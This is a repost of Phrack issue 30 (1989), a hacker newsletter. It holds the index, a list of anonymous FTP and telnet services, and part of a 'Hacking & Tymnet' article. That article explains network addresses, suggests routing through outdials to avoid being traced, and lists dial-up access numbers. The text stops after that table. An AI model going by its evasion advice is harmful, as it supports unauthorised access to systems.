Exploit Phrack #30

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42841
Проверка EDB
  1. Пройдено
Автор
PHRACK
Тип уязвимости
PAPERS
Платформа
MAGAZINE
CVE
N/A
Дата публикации
1989-12-24
Phrack #30
Код:
                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #1 of 12

                    Phrack Inc. Newsletter Issue XXX Index
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                               December 24, 1989

     Welcome to Issue 30 of Phrack Inc.  We are releasing this just a few short
days before the start of a new decade and proud to say that we will continue to
bring you more information well into the 1990s.

     SummerCon 1990!  That's right.  Preliminary plans are being made right
now, so, starting with this issue, keep your eye on Phrack World News for
details!  The dates have been decided so mark your calendars!

     This issue of Phrack Inc. features a large article by Goe that contains
some information about VM/CMS which can, if used properly, be of great use.
Also in this issue, Jack T. Tab brings us a VAX/VMS version of the Fakemail
program that was featured for Unix in Phrack Inc. Volume Three, Issue 27, File
#8.  Also, Network Miscellany III, compiled by Taran King, contains a
relatively large list of FTP sites that allow anonymous FTP for those of you
who have been poking and stabbing around the Internet.  These along with all of
the rest of the articles should prove to be interesting reading for you!

     Do you have access to the Wide Area Networks?  Are you on Fidonet?  How
about UUCP or CompuServe?  If so, you can drop a line to us through the
networks at the addresses listed below.  We'd love to hear from you!

                   Taran King       &       Knight Lightning

                              [email protected]
                    ...!netsys!phrack  ([email protected])
                     phrack%[email protected]
                      phrack%[email protected]
                         phrack%[email protected]
_______________________________________________________________________________

Table of Contents:

1.  Phrack Inc. XXX Index by Taran King and Knight Lightning
2.  Network Miscellany III by Taran King
3.  Hacking & Tymnet by Synthecide
4.  Hacking VM/CMS by Goe
5.  The DECWRL Mail Gateway by Dedicated Link
6.  Decnet Hackola : Remote Turist TTY (RTT) by *Hobbit*
7.  VAX/VMS Fake Mail by Jack T. Tab
8.  Consensual Realities in Cyberspace by Paul Saffo
9.  The Truth About Lie Detectors by Razor's Edge
10.   Western Union Telex, TWX, and Time Service by Phone Phanatic
11-12 Phrack World News XXX/Parts 1-2 by Knight Lightning
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #2 of 12

                            Network Miscellany III
                            ~~~~~~~~~~~~~~~~~~~~~~
                                 By Taran King

                         With Extra Special Thanks To

                                 Dark OverLord

                               December 24, 1989


CARL
~~~~
The Colorado Alliance of Research Libraries, or CARL, is an on-line service
providing information from its member libraries as well as select information
databases.  The member libraries include Auraria, CU Health Sciences Center, CU
Law Library, Denver Public Library, Denver University, Denver University Law
School, Colorado School of Mines, University of Northern Colorado, University
of Wyoming, Government Publications, plus about five community colleges, Regis
College, Colorado State Publications, State Department of Education, Pikes Peak
Library, MARMOT Library System, and Boulder Public Library.  The information
databases include the following:  UnConver -- Article Access, "Facts,"
Encyclopedia, Metro Denver Facts, Info Colorado, Boston Library Consortium,
Library News, and New Journal Issues.

CARL is available via Telnet at PAC.CARL.ORG (192.54.81.128) and is pretty
clear to understand.  The Encyclopedia information database, unfortunately,
requires a valid username on the system.


COMPUSERVE ACCESS VIA INTERNET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You can access CompuServe via Telnet through the gateway/concentrator at
CTS.MERIT.EDU (35.1.1.6) by typing "CompuServe" at the "Which Host?" prompt.

CTS.MERIT.EDU (35.1.1.6) is a Cisco terminal server installed primarily for
users of the Merit computer network in Michigan.  This machine has a bunch of
serial lines going in each direction to/from a Merit Secondary Communications
Processor (SCP), which is the entity that gives you the "Which Host?" prompt.

Some other of the Merit services (like outbound Telnet from "Which Host?") have
been intentionally limited so that they only work within Merit.  Part of this
is apparently for reasons of accountability and security (no random hackers
dialing in and hacking machines in New Zealand) and part is for access control
(ports are scarce and services have costs so they try to limit who uses the
thing to paying customers).

CompuServe bills connections via this link as if it were via Telenet (which is
EXPENSIVE!).  It's an X.25 connection somewhere at a decently fast speed.

If you have particular questions about all of the various services that can be
accessed through Merit, either through the terminal server at CTS.MERIT.EDU
(35.1.1.6), Telneting directly into a Merit SCP or PCP, or via dial-up access,
contact [email protected] or INFO@MERIT on Bitnet.

For more details about what can be accessed via CTS.MERIT.EDU, stay tuned to
Network Miscellany for part IV in an upcoming issue of Phrack!


DATE AND TIME
~~~~~~~~~~~~~
Here's an interesting little trick.  Just in case you are on some system
without the ability to report what time it is by a command, connect via Telnet
to port 13 of an Internet Unix system.  This gives you the time and date and
then disconnects.  Some example systems of this include RUTGERS.EDU,
MICA.BERKELEY.EDU, UCBVAX.BERKELEY.EDU, and PIKES.COLORADO.EDU (example:
Telnet RUTGERS.EDU 13).


FTP
~~~
File Transfer Protocol or FTP is a way to transfer data or text files over the
Internet from remote sites.  The only problem is figuring out where something
is that you want to get.

The following is a list of sites accepting anonymous FTP user=anonymous,
password=login.  It was compiled by Jon Granrose with the help of a number of
contributors as well as a couple of lists that had been started.  If you have
any comments, additions, or corrections, mail them to [email protected] or
[email protected] or [email protected].

-------------------------------------------------------------------------------
System name                IP Address      Comments
-------------------------------------------------------------------------------
a.cs.uiuc.edu              128.174.5.20    TeX, dvi2ps, gif, texx2.7, amiga
accuvax.nwu.edu            129.105.49.1    PibTerm 4.1.3
ahwahnee.stanford.edu      36.56.0.208     pcip interface specs
ai.toronto.edu             128.100.1.65    SunOS4.0 SLIP beta,
                                           R3 xwebster fixes
albanycs.albany.edu        128.204.1.4     Best of comp.graphics
allspice.lcs.mit.edu       18.26.0.115     RFC1056 (PCMAIL) stuff, MIT snmp
ames.arc.nasa.gov          128.102.18.3    pcrrn, gnu grep
arisia.xerox.com           13.1.100.206    lisp, tcp/ip, IDA sendmail kit
arizona.edu                128.196.6.1     Icon, SR, SBProlog languages
arthur.cs.purdue.edu       128.10.2.1      RCS, Purdue tech reports
athena-dist.mit.edu        18.71.0.38      Hesiod name server, Kerberos, moira
bitsy.mit.edu              18.72.0.3       MIT worm paper
brownvm.brown.edu          128.148.128.40  MAC
bu-cs.bu.edu               128.197.2.1     Telecom
bu-it.bu.edu               128.197.2.40    Lots of interesting things.
bugs.nosc.mil              128.49.0.1      Minix
c.isi.edu                  26.3.0.103      info-ibmpc (Tenex)
cadre.dsl.pittsburgh.edu   128.147.128.1   jove for the Mac
camelot.berkeley.edu       128.32.149.18   "pmake", yet another parallel make
cayuga.cs.rochester.edu    192.5.53.209    Xfig, LaTeX style, Jove,
                                           NL-KR mail list
celray.cs.yale.edu         128.36.0.25     ispell, dictionary
charon.mit.edu             18.80.0.13      perl+patches, xdvi
cheddar.cs.wisc.edu        128.105.2.113   Common Lisp stuff, X11 courier fonts
cheops.cis.ohio-state.edu  128.146.8.62    comp.sources.*, alt.sources
citi.umich.edu             35.1.128.16     pathalias, (not CITI MacIP), webster
clutx.clarkson.edu         128.153.4.3     Turbo C stuff, net kit
cmx.npac.syr.edu           128.230.7.8     Lots of stuff
cod.nosc.mil               128.49.16.5     birdlist, PCstuff
columbia.edu               10.3.0.89       NEST network simulation testbed
crocus.waterloo.edu        129.97.128.6    STEVIE (vi-clone) in /u/grwalter/ftp
cs.cmu.edu                 128.2.222.173   screen, msdos interrupt list, zoo
                                           (in /afs/cs.cmu.edu/user/ralf/pub)
cs.orst.edu                128.193.32.1    Xlisp
cs.rochester.edu           192.5.53.209    See cayuga.cs.rochester.edu
cs.utah.edu                128.110.4.21    A Tour of the Worm, amiga forth
csc.ti.com                 128.247.159.141 Preliminary clx document
cunixc.cc.columbia.edu     128.59.40.130   MM mailer, Kermit, CAP/KIP
cygnusx1.cs.utk.edu        128.169.201.12  GCC, MM, Scheme
dartvax.dartmouth.edu      129.170.16.4    ??
decwrl.dec.com             128.45.1.1      No FTP; gatekeeper.dec.com
devvax.tn.cornell.edu      192.35.82.200   tn3270, gated
drizzle.cs.uoregon.edu     128.223.4.1     raytracing archive (markv)
dsrgsun.ces.cwru.edu       129.22.16.2     Minix, TOS atariST gcc from bammi
ecla.usc.edu               26.21.0.65      mg emacs
elbereth.rutgers.edu       128.6.4.61      /pub
emx.utexas.edu             128.83.1.33     /net.directory
expo.lcs.mit.edu           18.30.0.212     a home of X, portable bitmaps
f.ms.uky.edu               128.163.128.6   Lots of interesting things
flash.bellcore.com         128.96.32.20    Karn's RFC & IEN coll,
                                           Latest NET bits
ftp.ncsa.uiuc.edu          128.174.20.50   NCSA Telnet source, Mathematica
gatekeeper.dec.com         128.45.9.52     X11, recipes, cron, map,
                                           Larry Wall stuff
ghostwheel.andrew.cmu.edu  128.2.35.1      Hershey fonts
giza.cis.ohio-state.edu    128.146.8.61    X11R3, PEX
gpu.utcs.toronto.edu       128.100.100.1   Lots of stuff, pd ksh
grape.ecs.clarkson.edu     128.153.13.196  Opus BBS, ms-dos, graphics
gregorio.stanford.edu      36.8.0.11       vmtp-ip, ip-multicast
gtss.gatech.edu            128.61.4.1      amiga rexx stuff
hamlet.caltech.edu         192.12.19.3     Nansi (VMS)
hanauma.stanford.edu       36.51.0.16      Vplot graphical system
him1.cc.umich.edu          35.1.1.43       atari st (cd PC7:)
hipl.psych.nyu.edu         128.122.132.2   Jove in pub (v4.9 is latest)
hogg.cc.uoregon.edu        128.223.20.5    NorthWestNet site info
hotel.cis.ksu.edu          129.130.10.12   XBBS, msdos, U3G toolkit
hubcap.clemson.edu         192.5.219.1     GIF files, RFCs
husc6.harvard.edu          128.103.1.56    pcip, appleII archives, uumap copy
                                           and soon the parts of the ucb tahoe
                                           tape that are marked not-at&t
icec.andrew.cmu.edu        128.223.4.1     CMU Tutor, ICEC
ics.uci.edu                128.195.0.1     perfect hash function gen., web-to-c
indri.primate.wisc.edu     128.104.230.11  Macintosh Trans{Skel, Display, Edit}
ix1.cc.utexas.edu          128.83.1.21     amiga
ix2.cc.utexas.edu          128.83.1.29     amiga
iuvax.cs.indiana.edu       129.79.254.192  unix arc et al
j.cc.purdue.edu            128.210.0.3     c.s. {unix, x, amiga}, elm, uupc
jpl-devvax.jpl.nasa.gov    128.149.8.43    perl author
june.cs.washington.edu     128.95.1.4      TeXhax, dviapollo, SmallTalk, web2c
kampi.hut.fi               128.214.3.9     DES routines (unrestricted)
kolvi.hut.fi               128.214.3.7     Ham radio (FINLAND)
kuhub.cc.ukans.edu         129.237.1.10    VMS news
labrea.stanford.edu        36.8.0.47       dvips, paranoia
lambda.lanl.gov            128.165.4.4     Toolpack/1 for math sw in f77
lancaster.andrew.cmu.edu   128.2.13.21     CMU PCIP, RFC1073 telnetd,
                                           RFC1048 bootp
larry.cs.washington.edu    128.95.1.7      Poker
lbl-csam.arpa              128.3.254.6     See rtsg.ee.lbl.gov
linc.cis.upenn.edu         128.91.2.8      psfig for ditroff, TeX
llnl-winken.llnl.gov       128.115.14.1    comp.sources.misc
louie.udel.edu             128.175.1.3     net.exe, minix, NORD<>LINK, MH,
                                           amiga
m9-520-1.mit.edu           18.80.0.45      Xim (X image viewer)
maxwell.physics.purdue.edu 128.46.135.3    /pub/bible.tar.Z
mailrus.cc.umich.edu       35.1.1.26       This list, unix arc, apollo stuff
megaron.arizona.edu        192.12.69.1     See arizona.edu
mimsy.umd.edu              128.8.128.8     declarative languages bib, SLIP
monk.proteon.com           128.185.123.16  cc:mail to smtp gateway
mordred.cs.purdue.edu      128.10.2.2      X11R3
ncsuvx.ncsu.edu            128.109.153.1   Hack, Moria, Empire, Ogre
net1.ucsd.edu              128.54.0.10     macintosh (tenex)
nic.mr.net                 192.12.250.5    Minnesota Regional Net traffic data
nic.ddn.mil                10.0.0.51       RFC, other network info in NETINFO:
nis.nsf.net                35.1.1.48       Merit info, NSFnet Link Letter
nisc.nyser.net             192.33.4.10     Nysernet, IETF, GOSIP
nl.cs.cmu.edu              128.2.222.56    Fuzzy Pixmap 0.84 in /usr/mlm/ftp
oddjob.uchicago.edu        128.135.4.2     NNTP, Sendmail, utils,
                                           Ethernet stuff
omnigate.clarkson.edu      128.153.4.2     PS maps of the Domain Name system.
parcvax.xerox.com          13.1.100.206    See arisia.xerox.com
panarea.usc.edu            128.125.3.54    Archive for "maps"
pawl.rpi.edu               128.113.10.2    DVI stuff, Atari ST, vi for dos
plains.nodak.edu           192.33.18.50    ASCII pics, /pub/picture
po1.andrew.cmu.edu         128.2.11.131    ??
po2.andrew.cmu.edu         128.2.249.105   ??
postgres.berkeley.edu      128.32.149.1    University INGRES,
prep.ai.mit.edu            128.52.32.14    GNU, MIT C Scheme, gnu e?grep
radio.astro.utoronto.ca    128.100.75.4    UFGATE, msdos, lots
rascal.ics.utexas.edu      128.83.144.1    KCL, MAXIMA, GCC-386,
                                           BoyerMoore prover
relgyro.stanford.edu       36.64.0.50      sunrast-to-pc
riacs.edu                  128.102.16.8    SLIP
ringo.rutgers.edu          128.6.5.77      Omega sources
rtsg.ee.lbl.gov            128.3.254.68    flex
sally.cs.utexas.edu                        Networking stuff
sbcs.sunysb.edu            128.48.2.3      sun raster tools
scam.berkeley.edu          128.32.138.1    X sources, etc.
science.utah.edu           118.110.192.2   TeX things (tenex)
score.stanford.edu         36.8.0.46       TexHax, Atari (tenex)
sh.cs.net                  192.31.103.3    Misc
shambhala.berkeley.edu                     xrn
sics.se                    192.16.123.90   Ham radio (SWEDEN)
simtel20.arpa              26.0.0.74       See wsmr-simtel20.army.mil
spam.istc.sri.com          128.18.4.3      Gnu, more
sphere.mast.ohio-state.edu 128.146.7.200   phone (with bugs fixed)
squid.cs.ucla.edu          128.97.16.28    soc.med.aids
sri-nic.arpa               10.0.0.51       See nic.ddn.mil
ssyx.ucsc.edu              128.114.133.1   atari, amiga, gifs
sumex.stanford.edu         36.44.0.6       mac archives, Mycin (SUN4), imap
sumex-2060.stanford.edu    36.45.0.87      Old home of mac archives (tenex)
sun.cnuce.cnr.it           192.12.192.4    atalk, ka9q
sun.soe.clarkson.edu       128.153.12.3    Packet Driver, X11 fonts, TeX
surya.waterloo.edu         129.97.129.72   gifs, tiff format, gif2ras
stolaf.edu                 130.71.128.1    news, anime, bitmaps
svax.cs.cornell.edu        128.84.254.2    TransFig, Fig-FS, NetHack
swan.ulowell.edu           129.63.224.1    sendmail, amiga, music, c.s. unix
thyme.lcs.mit.edu          18.26.0.94      SUPDUP
titan.rice.edu             128.42.1.30     sun-spots, amiga ispell
tmc.edu                    128.249.1.1     FUBBS bbs list
topaz.rutgers.edu          128.6.4.194     amiga
trantor.harris-atd.com     26.13.0.98      contool, chuck@%s's tools
trantor.umd.edu            128.8.1.14      Network Time Protocol(NTP),
                                           info-amiga
trwind.ind.trw.com         129.4.16.70     Turbo C src for net.exe
tumtum.cs.umd.edu          128.8.129.49    NeWS pd software
tut.cis.ohio-state.edu     128.146.8.60    GNU, lots of interesting things
ucbarpa.berkeley.edu       128.32.130.11   tn3270, pub/4.3
ucbvax.berkeley.edu        128.32.149.36   nntp, gnews, awm, empire
ucdavis.ucdavis.edu        128.120.2.1     ??
ucsd.edu                   128.54.16.1u    KA9Q archives, packet driver
umn-cs.cs.umn.edu          128.101.224.1   vectrex, mac, unix-pc
unmvax.unm.edu             129.24.12.128   getmaps,
unocss.unl.edu             129.93.1.11     alt.sex, motss
utadnx.cc.utexas.edu       128.83.1.26     VMS sources (zetaps, laser, sxlps)
uunet.uu.net               192.12.141.129  usenet archives, much more
ux.acss.umn.edu            128.101.63.2    usenix 87 archives
uxa.cso.uiuc.edu           128.174.2.1     mac, pcsig
uxc.cso.uiuc.edu           128.174.5.50    Games, misc
uxe.cso.uiuc.edu           128.174.5.54    amiga/Fish disks, PC-SIG 1-499
vax.ftp.com                128.127.25.100  FTP software, inc.
venera.isi.edu             128.9.0.32      statspy (NNstat)
venus.ycc.yale.edu         130.132.1.5     SBTeX
vgr.brl.mil                128.63.4.4      bsd ping + record route
venera.isi.edu             128.9.0.32      GNU Chess
watmath.waterloo.edu       129.97.128.1    Lots of stuff
wsmr-simtel20.army.mil     26.0.0.74       MS-DOS, Unix, CP/M, Mac, lots!
                                           (tenex)
xanth.cs.odu.edu           128.82.8.1      c.srcs.{x, unix, misc, games,
                                           amiga}, X10R4
zaphod.ncsa.uiuc.edu       128.174.20.50   NCSA Telnet source, binaries
z.andrew.cmu.edu           128.2.30.8      bugfixar + div


MELVYL ONLINE CATALOG
~~~~~~~~~~~~~~~~~~~~~
This service is provided by the University of California schools.  It is
available via Telnet by connecting to MELVYL.UCOP.EDU (31.1.0.1).  It basically
provides information searching capabilities and provides literary sources where
the "keyword" that you used may be found.  It is relatively self-explanatory.


NAMESERVERS
~~~~~~~~~~~
By connecting to port 101 on certain Internet systems, you have connected to
the nameserver of that domain.  To get a list of all of the subdomains of the
main domain, type ALL.  A sample system is VIOLET.BERKELEY.EDU but be
forewarned that the output from typing ALL is *EXTREMELY* long on this
particular system! (Example: Telnet VIOLET.BERKELEY.EDU 101).


PUBLIC ACCESS UNIX INFORMATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For those of you that are still interested in more information on the Public
Access Unix systems that were listed in Network Miscellany II featured in
Phrack 29, here are a few more details.  For specific information concerning
the nodes discussed, refer to the previous article.

For those of you who are not local to a Public Access Unix system, Portal can
be reached via PC-Pursuit for $25 a month and a $10 access fee for "portal"
(off-peak).  For information, contact John Little ([email protected]).


The Big Electric Cat (dasys1.UUCP) claims to be cheaper than most well-
connected public sites.  They have special billing for "organizational"
accounts if you're interested and their standard rate is $5 a month for an
account (no time restrictions).  The Big Electric Cat offers a superset of the
USENET newsgroups as well as unrestricted mail (!), a simplified set of prompts
for most system functions, games, and several other features


The World (WORLD.STD.COM) in Brookline, MA (Boston) is a Sun4/280 running
Sun/OS 4.0.3 (Unix.)  They offer electronic mail (to most anyplace), USENET,
ClariNet and general Unix access.  They dial UUNET and other sites frequently.

To create an account you just dial (617)739-WRLD (9753) and login as user "new"
(the login prompt gives instructions).  They ask for some info (name, address,
etc.) and a MasterCard or Visa account.

  Rates for The World
  ~~~~~~~~~~~~~~~~~~~
  All times are East Coast, USA.

  INITIAL SIGN-UP
  $25.00 fee, applied to first month's charges.
  BASIC ACCESS RATES
         8AM-6PM        $8.00/hour (Monday thru Friday)
         6PM-12M        $5.00/hour
         12M-8AM        $2.50/hour
  Weekends and holidays, 8AM-12M, $5/hour.

  Disk Quota
  ~~~~~~~~~~
  A "byte" is equivalent to one character of storage.
  A disk block is 1024 bytes.
         First 512 disk blocks              No Charge
         Additional Quota                   $0.01/block/month
                                            (approx. $10/MB/month)
  Note that disk charges are based on your requested disk quota (system imposed
  limit on your usage) and not your actual usage. Disk quota charges are
  pro-rated.

  Electronic Mail
  ~~~~~~~~~~~~~~~
  No charge for electronic mail between users of The World.  No charge for
  first 512 blocks of mail per month.  $0.01 per block of mail thereafter in
  any given month (approx. $10/MB/month).

  CPU Usage
  ~~~~~~~~~
  In general, they do not charge for these resources for typical accounts
  interested in electronic communications.  Customers who wish to use their
  system for compute or memory intensive applications should contact their
  office for rates.

  USENET
  ~~~~~~
  Local usage, no charge.  Network usage, no charge at this time.

  Printing And Fax
  ~~~~~~~~~~~~~~~~
  To be announced.

  Upload or Download Software
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  No additional charge.


UNIVERSITY OF CALIFORNIA AT BERKELEY NETWORK INFORMATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is a service which I, personally, have found to be extremely useful.  If
you need network information on virtually any system, connect to the University
of California at Berkeley Network Information at JADE.BERKELEY.EDU Port 117
(example:  Telnet JADE.BERKELEY.EDU 117).  Once you are logged into the system
automatically, it prompts you for a command or type "?" for a list of commands.
The help menu is relatively easy to understand.  You can get Bitnet network
table listings or Internet numerical addresses or Internet mail exchanger
listings or UUCP node information or UUCP node paths plus more.  It's very
useful in case you're having difficulty sending mail to a particular node from
your own node or if you're trying to connect to a system via FTP or Telnet that
your system doesn't recognize (i.e. get the numerical address from the server
and FTP or Telnet to the numerical address).
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #3 of 12

               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
               [-]                                          [-]
               [-]             Hacking & Tymnet             [-]
               [-]                                          [-]
               [-]                    by                    [-]
               [-]                                          [-]
               [-]                Synthecide                [-]
               [-]                                          [-]
               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]


There are literally hundreds of systems connected to some of these larger
networks, like Tymnet and Telenet.  Navigation around these networks is very
simple, and usually well explained in their on-line documentation.
Furthermore, some systems will actually tell you what is connected and how to
get to it.  In the case of Tymnet, after dialing in, at the log in prompt, type
"information" for the on-line documentation.

Accessing systems through networks is as simple as providing an address for it
to connect to.  The best way to learn about the addresses and how to do things
on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was
in Issue 22, File 4 of 12, Volume Two (December 23, 1988).  Some points are
re-iterated here.

Once on a network, you provide the NUA (network user address) of the system you
wish to connect to.  NUAs are strings of 15 digits, broken up in to 3 fields,
the NETWORK ADDRESS, the AREA PREFIX, and the DNIC.  Each field has 5 digits,
and are left padded with 0's where necessary.

The DNIC determines which network to take the address from.  Tymnet, for
example, is 03106. 03110 is Telenet.

The AREA PREFIX and NETWORK ADDRESS determine the connection point.  By
providing the address of the system that you wish to connect to, you will be
accessing it through the net... as if you were calling it directly.  Obviously,
then, this provides one more level of security for access.

By connecting to an outdial, you can increase again the level of security you
enjoy, by using the outdial in that area to connect to the remote system.

Addendum -- Accessing Tymnet Over Local Packet Networks

This is just another way to get that extra step and/or bypass other routes.
This table is copied from Tymnet's on-line information.  As said earlier, it's
a great resource, this on-line information!

                                 BELL ATLANTIC

  NODE    CITY                  STATE           SPEED    ACCESS NUMBER  NTWK
  ----   -------------------    --------------  ------   ------------   ----
  03526   DOVER                 DELAWARE        300/2400 302/734-9465   @PDN
  03526   GEORGETOWN            DELAWARE        300/2400 302/856-7055   @PDN
  03526   NEWARK                DELAWARE        300/2400 302/366-0800   @PDN
  03526   WILMINGTON            DELAWARE        300/1200 302/428-0030   @PDN
  03526   WILMINGTON            DELAWARE        2400     302/655-1144   @PDN


  06254   WASHINGTON            DIST. OF COL.   300/1200 202/479-7214   @PDN
  06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   2400     202/785-1688   @PDN
  06254   WASHINGTON (DOWNTOWN) DIST. OF COL.   300/1200 202/393-6003   @PDN
  06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   300/1200 202/293-4641   @PDN
  06254   WASHINGTON            DIST. OF COL.   300/1200 202/546-5549   @PDN
  06254   WASHINGTON            DIST. OF COL.   300/1200 202/328-0619   @PDN

  06254   BETHESDA              MARYLAND        300/1200  301/986-9942  @PDN
  06254   COLESVILLE            MARYLAND        300/2400  301/989-9324  @PDN
  06254   HYATTSVILLE           MARYLAND        300/1200  301/779-9935  @PDN
  06254   LAUREL                MARYLAND        300/2400  301/490-9971  @PDN
  06254   ROCKVILLE             MARYLAND        300/1200  301/340-9903  @PDN
  06254   SILVER SPRING         MARYLAND        300/1200  301/495-9911  @PDN


  07771   BERNARDSVILLE         NEW JERSEY      300/2400 201/766-7138   @PDN
  07771   CLINTON               NEW JERSEY      300-1200 201/730-8693   @PDN
  07771   DOVER                 NEW JERSEY      300/2400 201/361-9211   @PDN
  07771   EATONTOWN/RED BANK    NEW JERSEY      300/2400 201/758-8000   @PDN
  07771   ELIZABETH             NEW JERSEY      300/2400 201/289-5100   @PDN
  07771   ENGLEWOOD             NEW JERSEY      300/2400 201/871-3000   @PDN
  07771   FREEHOLD              NEW JERSEY      300/2400 201/780-8890   @PDN
  07771   HACKENSACK            NEW JERSEY      300/2400 201/343-9200   @PDN
  07771   JERSEY CITY           NEW JERSEY      300/2400 201/659-3800   @PDN
  07771   LIVINGSTON            NEW JERSEY      300/2400 201/533-0561   @PDN
  07771   LONG BRANCH/RED BANK  NEW JERSEY      300/2400 201/758-8000   @PDN
  07771   MADISON               NEW JERSEY      300/2400 201/593-0004   @PDN
  07771   METUCHEN              NEW JERSEY      300/2400 201/906-9500   @PDN
  07771   MIDDLETOWN            NEW JERSEY      300/2400 201/957-9000   @PDN
  07771   MORRISTOWN            NEW JERSEY      300/2400 201/455-0437   @PDN
  07771   NEWARK                NEW JERSEY      300/2400 201/623-0083   @PDN
  07771   NEW BRUNSWICK         NEW JERSEY      300/2400 201/247-2700   @PDN
  07771   NEW FOUNDLAND         NEW JERSEY      300/2400 201/697-9380   @PDN
  07771   PASSAIC               NEW JERSEY      300/2400 201/473-6200   @PDN
  07771   PATERSON              NEW JERSEY      300/2400 201/345-7700   @PDN
  07771   PHILLIPSBURG          NEW JERSEY      300/2400 201/454-9270   @PDN
  07771   POMPTON LAKES         NEW JERSEY      300/2400 201/835-8400   @PDN
  07771   RED BANK              NEW JERSEY      300/2400 201/758-8000   @PDN
  07771   RIDGEWOOD             NEW JERSEY      300/2400 201/445-4800   @PDN
  07771   SOMERVILLE            NEW JERSEY      300/2400 201/218-1200   @PDN
  07771   SOUTH RIVER           NEW JERSEY      300/2400 201/390-9100   @PDN
  07771   SPRING LAKE           NEW JERSEY      300/2400 201/974-0850   @PDN
  07771   TOMS RIVER            NEW JERSEY      300/2400 201/286-3800   @PDN
  07771   WASHINGTON            NEW JERSEY      300/2400 201/689-6894   @PDN
  07771   WAYNE/PATERSON        NEW JERSEY      300/2400 201/345-7700   @PDN


  03526   ALLENTOWN             PENNSYLVANIA    300/1200 215/435-0266   @PDN
  11301   ALTOONA               PENNSYLVANIA    300/1200 814/946-8639   @PDN
  11301   ALTOONA               PENNSYLVANIA    2400     814/949-0505   @PDN
  03526   AMBLER                PENNSYLVANIA    300/1200 215/283-2170   @PDN
  10672   AMBRIDGE              PENNSYLVANIA    300/1200 412/266-9610   @PDN
  10672   CARNEGIE              PENNSYLVANIA    300/1200 412/276-1882   @PDN
  10672   CHARLEROI             PENNSYLVANIA    300/1200 412/483-9100   @PDN
  03526   CHESTER HEIGHTS       PENNSYLVANIA    300/1200 215/358-0820   @PDN
  03526   COATESVILLE           PENNSYLVANIA    300/1200 215/383-7212   @PDN
  10672   CONNELLSVILLE         PENNSYLVANIA    300/1200 412/628-7560   @PDN
  03526   DOWNINGTON/COATES.    PENNSYLVANIA    300/1200 215/383-7212   @PDN
  03562   DOYLESTOWN            PENNSYLVANIA    300/1200 215/340-0052   @PDN
  03562   GERMANTOWN            PENNSYLVANIA    300/1200 215-843-4075   @PDN
  10672   GLENSHAW              PENNSYLVANIA    300/1200 412/487-6868   @PDN
  10672   GREENSBURG            PENNSYLVANIA    300/1200 412/836-7840   @PDN
  11301   HARRISBURG            PENNSYLVANIA    300/1200 717/236-3274   @PDN
  11301   HARRISBURG            PENNSYLVANIA    2400     717/238-0450   @PDN
  10672   INDIANA               PENNSYLVANIA    300/1200 412/465-7210   @PDN
  03526   KING OF PRUSSIA       PENNSYLVANIA    300/1200 215/270-2970   @PDN
  03526   KIRKLYN               PENNSYLVANIA    300/1200 215/789-5650   @PDN
  03526   LANSDOWNE             PENNSYLVANIA    300/1200 215/626-9001   @PDN
  10672   LATROBE               PENNSYLVANIA    300/1200 412/537-0340   @PDN
  11301   LEMOYNE/HARRISBURG    PENNSYLVANIA    300/1200 717/236-3274   @PDN
  10672   MCKEESPORT            PENNSYLVANIA    300/1200 412/673-6200   @PDN
  10672   NEW CASTLE            PENNSYLVANIA    300/1200 412/658-5982   @PDN
  10672   NEW KENSINGTON        PENNSYLVANIA    300/1200 412/337-0510   @PDN
  03526   NORRISTOWN            PENNSYLVANIA    300/1200 215/270-2970   @PDN
  03526   PAOLI                 PENNSYLVANIA    300/1200 215/648-0010   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/923-7792   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/557-0659   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/545-7886   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/677-0321   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    2400     215/625-0770   @PDN
  10672   PITTSBURGH            PENNSYLVANIA    300/1200 412/281-8950   @PDN
  10672   PITTSBURGH            PENNSYLVANIA    300/1200 412-687-4131   @PDN
  10672   PITTSBURGH            PENNSYLVANIA    2400     412/261-9732   @PDN
  10672   POTTSTOWN             PENNSYLVANIA    300/1200 215/327-8032   @PDN
  03526   QUAKERTOWN            PENNSYLVANIA    300/1200 215/538-7032   @PDN
  03526   READING               PENNSYLVANIA    300/1200 215/375-7570   @PDN
  10672   ROCHESTER             PENNSYLVANIA    300/1200 412/728-9770   @PDN
  03526   SCRANTON              PENNSYLVANIA    300/1200 717/348-1123   @PDN
  03526   SCRANTON              PENNSYLVANIA    2400     717/341-1860   @PDN
  10672   SHARON                PENNSYLVANIA    300/1200 412/342-1681   @PDN
  03526   TULLYTOWN             PENNSYLVANIA    300/1200 215/547-3300   @PDN
  10672   UNIONTOWN             PENNSYLVANIA    300/1200 412/437-5640   @PDN
  03562   VALLEY FORGE          PENNSYLVANIA    300/1200 215/270-2970   @PDN
  10672   WASHINGTON            PENNSYLVANIA    300/1200 412/223-9090   @PDN
  03526   WAYNE                 PENNSYLVANIA    300/1200 215/341-9605   @PDN
  10672   WILKINSBURG           PENNSYLVANIA    300/1200 412/241-1006   @PDN


  06254   ALEXANDRIA            VIRGINIA        300/1200  703/683-6710  @PDN
  06254   ARLINGTON             VIRGINIA        300/1200  703/524-8961  @PDN
  06254   FAIRFAX               VIRGINIA        300/1200  703/385-1343  @PDN
  06254   MCLEAN                VIRGINIA        300/1200  703/848-2941  @PDN


    @PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)


             (CONNECT MESSAGE)
